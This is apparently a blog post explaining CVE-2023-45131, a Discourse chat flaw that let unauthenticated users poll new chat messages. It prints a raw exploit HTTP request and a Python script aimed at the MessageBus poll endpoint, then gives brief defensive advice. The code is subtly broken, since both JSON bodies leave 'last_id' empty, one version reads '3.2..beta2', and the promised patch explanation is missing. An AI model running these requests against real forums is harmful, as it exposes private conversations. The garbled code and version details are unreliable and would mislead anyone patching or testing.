CVE-2023-45131 - How Discourse's Unauthenticated MessageBus Opened Chat Messages to Attackers

_Discovered in late 2023, CVE-2023-45131 is a security hole in Discourse’s chat component that could let attackers spy on new chat messages—without even logging in. This post breaks down what went wrong, shows example exploit requests, explains what Discourse did to patch it, and gives tips on how to stay secure._

What is Discourse, and Why Should You Care?

Discourse is a popular open source platform for community discussion. Many online forums, gaming guilds, and even companies use Discourse for chat and message boards. That makes vulnerabilities in Discourse a big deal—the software can power sensitive or high-profile communities.

What Went Wrong: The MessageBus Endpoint

One part of Discourse is “chat”—a real-time feature that lets users talk as if they’re on Slack or Discord. To keep chat messages live, Discourse uses something called MessageBus, which lets the frontend and backend quickly push and receive messages.

CVE-2023-45131 was discovered because attackers could make unauthenticated HTTP POST requests to a specific MessageBus endpoint, and get chat messages they shouldn’t have access to. In simpler terms: you didn’t even need to log in! Any random person could fetch and read new chat content.

Here’s the Exploit in Action

Imagine your Discourse site’s URL is https://example.com.

A malicious user could send an HTTP POST to the MessageBus polling endpoint like this

POST /message-bus/05f3e2d4b1b24713afe333f3bc14d1/poll HTTP/1.1
Host: example.com
Content-Type: application/json

{
  "channels": [
    "/chat/1234",
    "/chat/5678"
  ],
  "last_id": 
}

With this request, the attacker can poll chat channels and get messages—even if they’re not logged in, or shouldn’t see these messages.

Here’s a simplified Python script to demonstrate the exploit (educational use only!)

import requests

site_url = "https://example.com"
poll_endpoint = "/message-bus/05f3e2d4b1b24713afe333f3bc14d1/poll"

json_data = {
    "channels": [
        "/chat/1234"  # Replace with real channel ID
    ],
    "last_id": 
}

resp = requests.post(site_url + poll_endpoint, json=json_data)
print(resp.text)

If the site is vulnerable and you use a valid chat channel ID, it might return live message content.

Unauthenticated POST requests to the polling endpoint won’t return chat data any more.

There is no workaround for this bug—if your Discourse is <3.1.1 or <3.2..beta2, you’re at risk.

You can read the official GitHub security advisory and patch commit here

- Discourse CVE-2023-45131 Security Advisory
- Patch Commit Example

Monitor for Unusual Activity

Check your logs for strange POST requests to /message-bus/.../poll without sessions or authentication headers.

Original References

- Discourse Advisory on GitHub
- NIST NVD Entry CVE-2023-45131


_If you run Discourse, double-check your version today. Attackers don’t need much—don’t make it easy for them!_

Timeline

Published on: 10/16/2023 22:15:12 UTC
Last modified on: 10/19/2023 17:55:24 UTC